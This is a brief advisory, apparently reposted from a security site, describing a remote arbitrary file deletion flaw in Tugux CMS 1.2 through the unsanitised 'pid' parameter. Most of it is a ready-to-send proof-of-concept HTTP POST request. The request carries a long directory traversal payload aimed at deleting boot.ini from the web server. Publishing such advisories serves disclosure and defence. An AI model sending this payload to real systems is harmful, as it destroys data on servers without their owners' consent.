Tugux CMS 1.2 (pid) Remote Arbitrary File Deletion Vulnerability

Input passed to the ‘pid’ parameter in administrator/delete_page_parse.php is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server via directory traversal sequences passed within the ‘pid’ parameter.

PoC:

——————————

POST /tugux/administrator/delete_page_parse.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 175
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=—-x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

——x
Content-Disposition: form-data; name=”pid”

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../boot.ini
——x–

——————————

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5024.php

Comment are closed.